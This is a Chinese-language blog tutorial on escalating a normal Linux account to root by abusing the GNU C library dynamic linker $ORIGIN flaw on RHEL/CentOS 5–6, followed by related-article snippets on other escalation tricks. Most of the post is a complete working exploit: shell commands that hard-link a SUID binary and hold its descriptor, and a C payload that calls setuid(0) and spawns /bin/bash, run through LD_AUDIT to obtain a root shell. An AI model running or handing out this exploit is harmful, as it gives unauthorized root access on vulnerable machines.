c语言提权,提权教程:GNU C library动态链接区$ORIGIN溢出提权

最新推荐文章于 2022-07-18 11:53:47 发布
最新推荐文章于 2022-07-18 11:53:47 发布
阅读量316 收藏
点赞数
文章标签: c语言提权

摘要

利用tmp目录权限、suid 权限和C语言使普通帐号提权为ROOT权限

合适用 RHEL5-RHEL6 CENTOS5-CENTOS6 均可以提权

提权方法

e42373ec363fba6e7732df31cb1e75b6.png

[moonsec@localhosttmp]$ mkdir /tmp/exploit

[moonsec@localhosttmp]$ ln /bin/ping /tmp/exploit/target

[moonsec@localhosttmp]$ exec 3< /tmp/exploit/target

[moonsec@localhosttmp]$ ls -l /proc/$$/fd/3

lr-x------ 1moonsec moonsec 64 Dec 19 06:10 /proc/2799/fd/3 -> /tmp/exploit/target

[moonsec@localhosttmp]$  rm -rf /tmp/exploit/

[moonsec@localhosttmp]$  ls -l /proc/$$/fd/3

lr-x------ 1moonsec moonsec 64 Dec 19 06:10 /proc/2799/fd/3 -> /tmp/exploit/target(deleted)

[moonsec@localhosttmp]$ cat > payload.c

void__attribute__((constructor)) init()

{

setuid(0);

system("/bin/bash");

}

[moonsec@localhosttmp]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c

[moonsec@localhosttmp]$ ls -l /tmp/exploit

-rwxrwxr-x 1moonsec moonsec 4223 Dec 19 06:10 /tmp/exploit

[moonsec@localhosttmp]$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3

[root@localhosttmp]# whoami

创建目录

mkdir /tmp/exploit

创建target文件硬链接

ln /bin/ping/tmp/exploit/target

把target文件加载到内存中

exec 3< /tmp/exploit/target

查看target在内存中的情况

ls -l /proc/$$/fd/3

删除目录

rm -rf /tmp/exploit/

输入c代码

cat > payload.c

void__attribute__((constructor)) init()

{

setuid(0);

system("/bin/bash");

}

编译文件

gcc -w -fPIC-shared -o /tmp/exploit payload.c

提升root权限

LD_AUDIT="\$ORIGIN"exec /proc/self/fd/3

05914ee36f85bd0023f082ea983ca89d.png

cetnots5.5 用户moonsec 提权到root权限

您可以选择一种方式赞助本站支付宝转账赞助

分享到各大网站

璐叔
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Linux溢出提权教程
03-08
【Linux溢出提权教程】 在信息安全领域,Linux操作系统中的权限提升(提权)是一种常见的攻击手段,通常涉及利用系统漏洞或程序错误来获取更高的权限。本教程将深入讲解Linux溢出提权的基础知识和实战技巧。 一、...
red hat5提权
04-10
2. **glibc-exp.sh**:`glibc`是GNU C库,它是Linux系统中的一个关键组件,用于提供C语言编程接口。`glibc-exp.sh`很可能是一个利用`glibc`漏洞的Shell脚本。在Red Hat 5时代,`glibc`可能存在一些已知的安全漏洞,...
20210414web渗透学习之GNU C library 动态链接 $ORIGIN 溢出提权(胃肠炎住院期间)
qq_45290991的博客
04-14 256
GNU C library dynamic linker $ORIGIN expansion Vulnerability from: http://marc.info/?l=full-disclosure&m=128739684614072&w=2 动态链接器(或动态加载器)是为连接运行时负责动态链接程序。 ld.so运行在两个安全模式,一个是宽松模式,使超过负荷运行控制程度高,一个是安全模式(libc_enable_secure)旨在防止用户的干扰装载特权可执行文件。 ...
119.网络安全渗透测试—[权限提升篇17]—[CentOS5.5 GNU C library 动态链接 $ORIGIN 溢出提权]
qwsn
07-08 1987
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 利用tmp目录权限、suid 权限和C语言使普通帐号提权为ROOT权限[root@localhost ~]# [root@localhost ~]# [root@localhost ~]# [demo1@localhost tmp]$ #创建目录 [demo1@localhost tmp]$ #创建target文件硬链接 [demo1@localhost tmp]$ #把target文件加载到内存中 [de
利用Glibc库-ORIGIN-提权
weixin_33910137的博客
06-05 294
2019独角兽企业重金招聘Python工程师标准>>> ...
c语言提权程序,webshell 写入启动项提权
weixin_39842955的博客
05-25 279
我们在拿到一个网站的webshell的时候如果想进一步的获得网站的服务器权限.我们可以查看现在服务器上系统盘的可读可写目录如果说服务器上的 C:\Documents and Settings\All Users\「开始」菜单\程序\启动 ‘目录存在可读可写目录那么我们就可以执行上传一个vbs或者bat的脚本进行提权。这里我就具体来讲解下用vbs脚本进行提权,来添加用户。1.我们先写一个vbs的...
关于C语言运算的自动提权及类型转换的问题
Super_Demo的专栏
10-22 904
先上程序 Test1 = (uTest-4760); Test2 = (uTest-4760)/10; uTest = (uint32_t)(uTest-4760); Test3 = uTest/10; Test4 = 0;
C语言嵌入式Linux编程第5期:C标准及GNU C扩展
06-09
本课程是《C语言嵌入式Linux编程》第5期主要内容包括:Linux内核、驱动程序中,GNU C对标准C扩展的大量的语法。学员在掌握这些扩展语法的基础上,消除阅读Linux内核、驱动、GNU开源软件的障碍。能够看懂这些“稀奇...
gsl-sf:GNU Scientific Library for JS 的特殊功能
07-04
GNU Scientific Library for JS 的特殊功能 安装 通过 npm: npm install gsl-sf 要在节点内使用它: var sf = require("gsl-sf"); 应用程序接口 有关原始 C 函数的完整文档,请访问 。 前缀gsl_sf_已从原始...
C语言GNU扩展语法.doc
05-12
GNU C 是 GNU 编译器集合 (GCC) 对标准 C 语言的一系列扩展,它增强了标准 C 的功能,包括优化、代码布局和安全性检查。在Linux内核开发中,GNU C 扩展被广泛使用,使得GNU CC成为编译内核的首选编译器。下面我们将...
c语言提权,三个给进程提权的方法 (c/cpp)
weixin_32473663的博客
05-19 854
#defineSE_CREATE_TOKEN_NAME TEXT("SeCreateTokenPrivilege")#defineSE_ASSIGNPRIMARYTOKEN_NAME TEXT("SeAssignPrimaryTokenPrivilege")#defineSE_LOCK_MEMORY_NAME TEXT("SeLo...
c语言将文件提权,利用tmp目录权限、suid 权限和C语言使普通帐号提权为ROOT权限...
weixin_42497299的博客
05-24 1070
提权:利用tmp目录权限、suid 权限和C语言使普通帐号提权为ROOT权限RHEL5-RHEL6下面都可以实现,root的UID是零创建一个普通用户useradd andy切换到andy用户su - andy查看当前用户是谁whoami查看tmp目录权限[andy@bogon tmp]$ ll -d /tmpdrwxrwxrwt. 15 root root 4096 6月 29 14:08 /...
[提权] 使用 ShellCode 注入其他进程
LYSM
11-27 992
背景 如果将shellcode注入到具有特定权限的进程中,使用 ShellCode 创建的进程就可以获得与该进程相同的权限。 本次使用的工具,依旧是上次编写的PETools: https://www.cnblogs.com/LyShark/p/12960816.html 提权降权工具下载地址: https://www.blib.cn/soft/pexec.zip 枚举系统进程,与进程权限令牌等。 #include <stdio.h> #include <Windows.h> #inc
C语言 提升system权限,win7系统提升至System权限的四种方法
weixin_30335379的博客
05-20 1730
在Win7系统下,有一些文件、文件夹或是注册表项是需要system权限才可以访问操作的,这时就算是管理员帐户也不行,那怎么办呢?当然是提权了,下面小编分享win7系统提升至System权限的四种方法方法一:这是一个以sc指令为基础的脚本,原理很简单,自己观察你会发现所有的服务都是由system所创建和运行的sc Create SuperCMD binPath= "cmd /K start" typ...
反弹shell通过普通用户进行SUID提权
sGanYu
07-18 1247
如果普通账号tom需要修改密码,就要访问/etc/shadow,由于/etc/passwd文件是所有用户都可读的,如果用户的密码太简单或规律比较明显的话,一台普通的计算机就能够很容易地将它破解,因此对安全性要求较高的Linux系统都把加密后的口令字分离出来,单独存放在一个文件中,这个文件是/etc/shadow文件,有超级用户才拥有该文件读权限,但是该文件只有root能访问。当tom需要修改密码,passwd程序的所有者为root,tom用户执行passwd程序的过程中会暂时获得root权限。...
linux更改链接对象,利用动态链接共享对象库进行Linux提权
weixin_36048512的博客
05-12 184
如果将RPATH和弱文件权限提升到系统权限?Linux应用使用动态链接共享对象库(dynamically linked shared object libraries)在不用重写代码的情况下,提供给应用同样的功能——有点像Windows的DLL文件。与Windows中的DLL植入OS怎样找到共享库?当使用共享库的应用运行时,操作系统就会以下面的顺序寻找库:1. rpath-link选项中指定的目录...
GNU C library 动态链接 $ORIGIN 溢出漏洞
10-20 1011
<br />GNU C library dynamic linker $ORIGIN expansion Vulnerability<br />from: http://marc.info/?l=full-disclosure&m=128739684614072&w=2<br />动态链接器(或动态加载器)是为连接运行时负责动态链接程序。 ld.so运行在两个安全模式,一个是宽松模式,使超过负荷运行控制程度高,一个是安全模式(libc_enable_secure)旨在防止用户的干扰装载特权可执行文件。<br
glibc 知:ld.so
canpool
08-01 1809
dynamic linker/loader 动态链接器/加载器
C语言的构造函数与析构函数
rayylee
11-16 3600
C++和JAVA中有构造函数,C语言中也有实现的方法,在gcc下可以使用关键字 __attribute__指定构造函数或者析构函数。他们由编译器在编译阶段进行处理。 声明构造函数: void __attribute__((constructor)) function(void) 声明析构函数: void __attribute__((destructor)) function(void) 例: #include <stdio.h> void __attribute__((construct
GNU C Library手册:C资源详解与使用指南
GNU C库参考手册》(The GNU C Library Reference Manual) 是C语言编程领域的权威指南,由GNU项目维护,特别适合于那些想要深入了解Clib库,即GNU C标准库的开发者。版本2.31包含了作者Sandra Loosemore、Richard M...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值